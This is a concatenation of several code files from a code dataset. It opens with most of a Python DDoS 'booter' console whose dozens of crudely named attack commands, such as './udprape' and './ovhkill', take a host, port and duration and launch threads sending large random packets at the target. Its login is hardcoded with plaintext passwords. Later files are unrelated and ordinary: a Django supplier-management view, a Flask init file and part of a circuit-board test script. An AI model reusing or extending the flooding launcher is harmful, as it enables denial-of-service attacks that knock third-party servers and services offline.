print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./icmprape":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./mag-7":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./ovhslav":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./ovhkill":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./udprape":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./ovhamp":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./ovhnat":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 51516
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./ovhdown":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 55162
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./slav":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./cpukill":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./fivemkill":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./icmprape":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./tcprape":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 51516
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./nforape":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 55162
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./killv1":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./killv2":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./killv3":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./ntp-x":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./ak47":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./2kdown":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./psnrape":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./sql-lift":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 51516
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./hydrakiller":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 55162
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./icmp-echo":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./cpu-smash":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./tcp-amp":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./hotspot":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./orange-syn":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 51516
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./purple-syn":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 55162
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./backend-chew":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./dhcp":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./udprape":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./udprapev2":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./madara":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./udprape":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./killallv2":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./udprapev3":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 51516
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./udpbypass":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 55162
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./vip-clap":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./icmprape":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./killallv3":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./x-v-x":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./greeth":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./killall":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./powerslap":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./rainbow-syn":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./Tempest":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./mark-iii":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "./rapecom":
try:
if running >= 1:
print("\033[97mYou have reached your concurrents limit and must wait for your cooldown period to end.")
main()
else:
sinput, host, timer, port = sin.split(" ")
socket.gethostbyname(host)
pack = 65500
punch = random._urandom(int(pack))
threading.Thread(target=randsender, args=(host, timer, port, punch)).start()
print("\033[97mYour Attack Has Been Launched!")
except ValueError:
main()
except socket.gaierror:
main()
elif sinput == "stopattacks":
attack = False
while not attack:
if aid == 0:
attack = True
elif sinput == "stop":
attack = False
while not attack:
if aid == 0:
attack = True
else:
main()
try:
users = ["hg", "guests", "me"]
clear = "clear"
os.system (clear)
print (user)
username = getpass.getpass ("[+] Username: ")
if username in users:
user = username
else:
print ("[+] Incorrect, exiting")
exit()
except KeyboardInterrupt:
print ("\nCTRL-C Pressed")
exit()
try:
passwords = ["hg", "gayman", "me"]
print (passw)
password = getpass.getpass ("[+] Password: ")
if user == "hg":
if password == passwords[0]:
print ("[+] Login correct")
cookie.write("DIE")
time.sleep(2)
os.system (clear)
try:
os.system ("clear")
print (banner)
main()
except KeyboardInterrupt:
print ("\n[\033[91mSIN\033[00m] CTRL has been pressed")
main()
else:
print ("[+] Incorrect, exiting")
exit()
if user == "guests":
if password == passwords[1]:
print ("[+] Login correct")
print ("[+] Certain methods will not be available to you")
time.sleep(4)
os.system (clear)
try:
os.system ("clear")
print (banner)
main()
except KeyboardInterrupt:
print ("\n[\033[91mSIN\033[00m] CTRL has been pressed")
main()
else:
print ("[+] Incorrect, exiting")
exit()
except KeyboardInterrupt:
exit()
try:
clear = "clear"
os.system(clear)
main()
except KeyboardInterrupt:
exit()
| [
"noreply@github.com"
] | iShinj1.noreply@github.com |
40f756004da71f05733139a24309c3462c7ec54b | 43d4b962a83dac734dfb09b8523fdfcfcc6628c1 | /lavajato_fornecedor/views.py | c245e3d77cf35444022eb95c2347a0cc74207d4f | [] | no_license | redcliver/sistemas | 01edd98c2814eee50550010169b2c7594e5256f5 | 1129c9516c57fbf53ce3cf5e0e5feb3835d3e9df | refs/heads/master | 2020-04-07T17:23:04.809752 | 2019-05-02T16:24:18 | 2019-05-02T16:24:18 | 158,567,651 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,460 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render
from .models import fornecedor
# Create your views here.
def lavajato_fornecedor(request):
if request.user.is_authenticated():
empresa = request.user.get_short_name()
if empresa == 'dayson':
if request.method == 'POST' and request.POST.get('nome') != None:
name = request.POST.get('nome')
telefone = request.POST.get('tel')
celular = request.POST.get('cel')
cpf = request.POST.get('cpf')
email = request.POST.get('mail')
endereco = request.POST.get('endereco')
numero = request.POST.get('numero')
bairro = request.POST.get('bairro')
cidade = request.POST.get('cidade')
uf_cidade = request.POST.get('uf_cidade')
novo_fornecedor = fornecedor(nome=name, telefone=telefone, celular=celular, cpf=cpf, email=email, endereco=endereco, numero=numero, bairro=bairro, cidade=cidade, uf_cidade=uf_cidade)
novo_fornecedor.save()
msg = name+" salvo com sucesso!"
return render(request, 'lavajato_fornecedor/fornecedor_novo.html', {'title':'Novo Fornecedor','msg':msg})
return render(request, 'lavajato_fornecedor/fornecedor_novo.html', {'title':'Novo Fornecedor'})
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
else:
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
def busca(request):
if request.user.is_authenticated():
empresa = request.user.get_short_name()
if empresa == 'dayson':
fornecedores = fornecedor.objects.all().order_by('nome')
if request.method == 'POST' and request.POST.get('fornecedor_id') != None:
fornecedor_id = request.POST.get('fornecedor_id')
fornecedor_obj = fornecedor.objects.get(id=fornecedor_id)
return render(request, 'lavajato_fornecedor/fornecedor_visualiza.html', {'title':'Visualizar Fornecedor', 'fornecedor_obj':fornecedor_obj})
return render(request, 'lavajato_fornecedor/fornecedor_busca.html', {'title':'Buscar Fornecedor', 'fornecedores':fornecedores})
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
else:
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
def edita(request):
if request.user.is_authenticated():
empresa = request.user.get_short_name()
if empresa == 'dayson':
fornecedores = fornecedor.objects.all().order_by('nome')
if request.method == 'POST' and request.POST.get('fornecedor_id') != None:
fornecedor_id = request.POST.get('fornecedor_id')
fornecedor_obj = fornecedor.objects.get(id=fornecedor_id)
return render(request, 'lavajato_fornecedor/fornecedor_edita.html', {'title':'Editar Fornecedor', 'fornecedor_obj':fornecedor_obj})
return render(request, 'lavajato_fornecedor/fornecedor_busca_edita.html', {'title':'Editar Fornecedor', 'fornecedores':fornecedores})
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
else:
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
def salva(request):
if request.user.is_authenticated():
empresa = request.user.get_short_name()
if empresa == 'dayson':
fornecedores = fornecedor.objects.all().order_by('nome')
if request.method == 'POST' and request.POST.get('fornecedor_id') != None:
fornecedor_id = request.POST.get('fornecedor_id')
fornecedor_obj = fornecedor.objects.get(id=fornecedor_id)
nome = request.POST.get('nome')
tel = request.POST.get('tel')
cel = request.POST.get('cel')
cpf = request.POST.get('cpf')
mail = request.POST.get('mail')
endereco = request.POST.get('endereco')
numero = request.POST.get('numero')
bairro = request.POST.get('bairro')
cidade = request.POST.get('cidade')
uf_cidade = request.POST.get('uf_cidade')
bloqueado = request.POST.get('bloqueado')
fornecedor_obj.nome = nome
fornecedor_obj.telefone = tel
fornecedor_obj.celular = cel
fornecedor_obj.cpf = cpf
fornecedor_obj.email = mail
fornecedor_obj.endereco = endereco
fornecedor_obj.numero = numero
fornecedor_obj.bairro = bairro
fornecedor_obj.cidade = cidade
fornecedor_obj.uf_cidade = uf_cidade
fornecedor_obj.estado = bloqueado
fornecedor_obj.save()
msg = fornecedor_obj.nome + " editado(a) com sucesso!"
return render(request, 'lavajato_fornecedor/fornecedor_edita.html', {'title':'Editar Fornecedor', 'fornecedor_obj':fornecedor_obj, 'msg':msg})
return render(request, 'lavajato_fornecedor/fornecedor_busca_edita.html', {'title':'Editar Fornecedor', 'fornecedores':fornecedores})
return render(request, 'sistema_login/erro.html', {'title':'Erro'})
else:
return render(request, 'sistema_login/erro.html', {'title':'Erro'}) | [
"igor-peres@hotmail.com"
] | igor-peres@hotmail.com |
5669ab57cd6e854011e0316c92d47d11d5c14dc9 | e27993d156265e293b0ed0eed7136a1080edcee5 | /timetabler/__init__.py | d0fb1141365f857a8a3e190dcbde2531149eb39a | [
"MIT"
] | permissive | jordannoble/icmaths-timetabler | 6a88f3e49f61b0887510a5f99b7fa90a61f0a583 | d86f9551905e046ec9df6599f656d5bf40f62263 | refs/heads/master | 2016-09-05T12:47:00.380568 | 2014-09-26T07:59:18 | 2014-09-26T07:59:18 | 23,847,615 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 71 | py | from flask import Flask
app = Flask(__name__)
import timetabler.views
| [
"jn610@imperial.ac.uk"
] | jn610@imperial.ac.uk |
ac3a413222f1c781a87ae64071c11456543630e3 | 71764665e27f4b96bab44f38a4a591ffc2171c24 | /hhplt/productsuite/RD50C/auto_test1.py | 343f405b2ee4ee990bbf72e929d2d148330595b7 | [] | no_license | kingdomjc/RSU_production_VAT | 693f8c504acc0cc88af92942734ccb85f7e7d7c0 | 9a3d6d3f5a5edfaf30afdff725661630aafe434c | refs/heads/master | 2020-07-31T05:03:46.699606 | 2019-09-24T02:09:53 | 2019-09-24T02:09:53 | 210,491,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,235 | py | #encoding:utf-8
u'''本工位测试前请先在测试PC上运行APP版本下载服务程序TFTPSRV.EXE;
1、被测RSDB0单板通过排线连接作为工装的RSIB0板(LED&PSAM卡面板)、测试串口线、网口连接网线;
2、RSDB0单板上电;
3、根据VAT提示按下单板上复位按钮S1;
4、面板灯测试项需人工观察判断面板灯运行情况。
'''
import socket
import serial
from hhplt.deviceresource.checkVersion import VersionManager
from hhplt.productsuite.RD50C import downloadEPLD
from hhplt.testengine.server import ServerBusiness
suiteName = u'''RSDB0单板功能测试工位'''
version = "1.0"
failWeightSum = 10 #整体不通过权值,当失败权值和超过此,判定测试不通过
import binascii
import os
import re
import telnetlib
from hhplt.deviceresource.RD50CAutoTestMyd import PsamProxy, DeviceProxy, RTCProxy, MACProxy, PCIEProxy
from hhplt.testengine.testcase import superUiLog, uiLog
from hhplt.testengine.exceptions import TestItemFailException,AbortTestException
from hhplt.deviceresource import RD50CDownloadNetMyd
import time
from hhplt.deviceresource import TestResource, askForResource
from hhplt.parameters import PARAM
import hhplt.testengine.manul as manul
from hhplt.testengine.manul import askForSomething, manulCheck
import manual_test
#串口夹具开合触发器
#测试函数体例:T_<序号>_方法名
#_A为自动完成测试,_M为人工测试;函数正常完成,返回值为输出数据(可空);异常完成,抛出TestItemFailException异常,含输出(可选)
#函数的doc中,<测试名称>-<描述>
#可选的两个函数:setup(product)和rollback(product),前者用于在每次测试开始前(不管选择了多少个用例)都执行;后者当测试失败(总权值超出)后执行
def __checkManualFinished(idCode):
'''检查RSDB0单板电源&BOOT下载工位已完成'''
with ServerBusiness(testflow = True) as sb:
status = sb.getProductTestStatus(productName="RD50C_RSU" ,idCode = idCode)
if status is None:
raise AbortTestException(message=u"RSDB0尚未进行单板测试,RSDB0单板功能测试终止")
else:
sn1 = downloadEPLD.suiteName
if sn1 not in status["suiteStatus"] or status["suiteStatus"][sn1] != 'PASS':
raise AbortTestException(message=u"RSDB0单板电源&BOOT下载测试项未进行或未通过,RSDB0单板功能测试终止")
def pingIPOpen(pingIP):
data = os.popen('ping %s' % pingIP).readlines()
print data
for line in data:
if re.search(r'TTL=', line, re.I):
return "ok"
return "no"
def __doorDog():
sc = __askForPlateDeviceCom() # 获取资源GS10PlateDevice
downNet = sc.doorDog()
return downNet
def __askForPlateDeviceCom():
'''获得工装板资源'''
sc = askForResource('RD50CPlateDevice', RD50CDownloadNetMyd.GS10PlateDevice,
serialPortName = PARAM["defaultCOMPort"],
cableComsuption = 1)
return sc
def __downloadVersion():
sc = __askForPlateDeviceCom() # 获取资源GS10PlateDevice
versionFile = None
downNet = sc.downloadVersion(version_file=versionFile)
return downNet
def T_01_scanCode_A(product):
u'扫码条码-扫描条码'
barCode = askForSomething(u'扫描条码', u'请扫描RSDB0单板条码', autoCommit=False)
__checkManualFinished(barCode)
product.setTestingProductIdCode(barCode)
product.setTestingSuiteBarCode(barCode)
return {u"RSDB0单板条码": barCode}
def T_02_downloadNet1_A(product):
u'单板网口测试-RSDB0单板网口通信功能及APP版本下载测试'
retry = ""
t = 0
while True:
t += 1
powerResult = manulCheck(u'复位', u'%s请在点击确定按钮后,按下单板上的复位按键S1'%retry,check="ok")
